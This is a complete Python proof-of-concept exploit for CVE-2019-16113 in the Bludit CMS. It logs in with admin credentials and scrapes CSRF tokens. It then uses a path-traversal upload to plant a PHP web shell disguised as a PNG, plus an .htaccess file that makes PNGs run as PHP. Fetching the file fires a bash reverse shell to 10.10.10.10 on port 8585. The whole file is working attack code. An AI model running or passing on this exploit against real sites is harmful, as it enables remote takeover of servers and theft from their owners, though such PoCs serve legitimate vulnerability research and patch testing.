CVE-2019-16113.py

#!/usr/bin/env python

import requests
import re

# PoC by @hg8
# Credit: @christasa
# https://github.com/bludit/bludit/issues/1081

url = "http://bludit-example.com"
user = "admin"
password = "admin"
cmd = "bash -c 'bash -i >& /dev/tcp/10.10.10.10/8585 0>&1'"


def admin_login():
    s = requests.Session()
    login_page = s.get(f"{url}/admin/")
    csrf_token = re.search('"tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    data = {
        "username": user,
        "password": password,
        "tokenCSRF": csrf_token
    }

    r = s.post(f"{url}/admin/", data, allow_redirects=False)

    if r.status_code != 301:
        print("[!] Username or password incorrect.")
        exit()

    print("[+] Loggin successful.")
    return s


def get_csrf(s):
    r = s.get(f"{url}/admin/")
    csrf_token = r.text.split('var tokenCSRF = "')[1].split('"')[0]
    print(f"[+] Token CSRF: {csrf_token}")
    return csrf_token


def upload_shell(s, csrf_token):
    data = {
        "uuid": "../../tmp",
        "tokenCSRF": csrf_token
    }

    multipart = [('images[]', ("blut.png", "<?php shell_exec(\"rm .htaccess;rm blut.png;" + cmd + "\");?>", 'image/png'))]

    r = s.post(f"{url}/admin/ajax/upload-images", data, files=multipart)

    if r.status_code != 200:
        print("[!] Error uploading Shell.")
        print("[!] Make sure Bludit version >= 3.9.2.")

    print("[+] Shell upload succesful.")

    multipart_htaccess = [('images[]', ('.htaccess', "RewriteEngine off\r\nAddType application/x-httpd-php .png", 'image/png'))]
    r = s.post(url + "/admin/ajax/upload-images", data, files=multipart_htaccess)

    if r.status_code != 200:
        print("[!] Error uploading .htaccess.")
        print("[!] Make sure Bludit version >= 3.9.2.")

    print("[+] .htaccess upload succesful.")


def execute_cmd(s):
    try:
        r = s.get(f"{url}/bl-content/tmp/blut.png", timeout=1)
    except requests.exceptions.ReadTimeout:
        pass

    print("[+] Command Execution Successful.")


if __name__ == '__main__':
    session = admin_login()
    csrf_token = get_csrf(session)
    upload_shell(session, csrf_token)
    execute_cmd(session)